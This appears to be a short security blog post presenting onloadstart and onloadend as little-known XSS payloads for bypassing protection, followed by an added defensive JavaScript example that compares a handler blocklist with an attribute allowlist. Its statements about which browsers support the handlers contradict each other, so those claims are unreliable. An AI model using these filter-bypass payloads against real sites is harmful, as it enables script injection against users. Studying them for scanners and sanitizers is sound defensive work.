
onload*(start/end) event handler XSS (Any browser)

Hi hackers. Last time I wrote about onpointer* XSS; this time I'm writing about a not well-known event handler for XSS. (https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)

onload* event handler for XSS

It's the onload* handlers! Handlers that start with onload are usually well known, but onloadstart and onloadend are not.

<!-- onloadstart -->
<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->
<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

I tested onloadstart on my site. It works!

But only in Firefox.
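
Why this matters for filters, as an added example (not from the original post and not XSpear code): a handler-name blocklist lets onloadstart and onloadend through, while an attribute allowlist rejects them without knowing their names. The two lists, the sample markup and all function names are constructed for illustration, and the tokenizer is a simplification, not a full HTML parser.

```javascript
// Added example: handler-name blocklist vs. attribute allowlist.
// Both lists and SAMPLE are constructed for illustration.
const KNOWN_HANDLERS = new Set(["onload", "onerror", "onclick", "onmouseover", "onfocus"]);
const ALLOWED_ATTRS = new Set(["src", "alt", "width", "height"]);

// Constructed input: the two handlers from this post plus one well-known handler.
const SAMPLE = [
  '<!-- onloadstart -->',
  '<img src="https://example.com/a.gif" onloadstart="alert(45)">',
  '<img src="https://example.com/a.gif" onloadend="alert(45)">',
  '<img src=x onerror="alert(45)">',
].join("\n");

// Simplified start-tag tokenizer (not a full HTML parser): returns the
// lower-cased attribute names of every start tag, skipping comments.
function attributeNames(html) {
  const tagRe = /<[a-zA-Z][^\s\/>]*((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  for (const tag of html.matchAll(tagRe)) {
    for (const attr of tag[1].matchAll(attrRe)) {
      names.push(attr[1].toLowerCase());
    }
  }
  return names;
}

// Weak check: rejects only handler names the filter already knows about.
function blocklistRejects(html) {
  return attributeNames(html).filter((name) => KNOWN_HANDLERS.has(name));
}

// Stronger check: rejects every attribute that is not explicitly allowed,
// so handlers the filter author never heard of are rejected as well.
function allowlistRejects(html) {
  return attributeNames(html).filter((name) => !ALLOWED_ATTRS.has(name));
}

// Handlers that pass the blocklist but are stopped by the allowlist.
function missedByBlocklist(html) {
  const caught = new Set(blocklistRejects(html));
  return allowlistRejects(html).filter((name) => !caught.has(name));
}

console.log("blocklist rejects:", blocklistRejects(SAMPLE));
console.log("allowlist rejects:", allowlistRejects(SAMPLE));
console.log("missed by blocklist:", missedByBlocklist(SAMPLE));
```

For real output sanitization, apply the same allowlist idea through a maintained HTML sanitizer rather than a regex tokenizer like this one.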

for XSpear

Add event handler pattern! https://github.com/hahwul/XSpear/issues/18

Licensed under CC BY-NC-SA 4.0
Last updated on Jul 10, 2021 01:05 +0900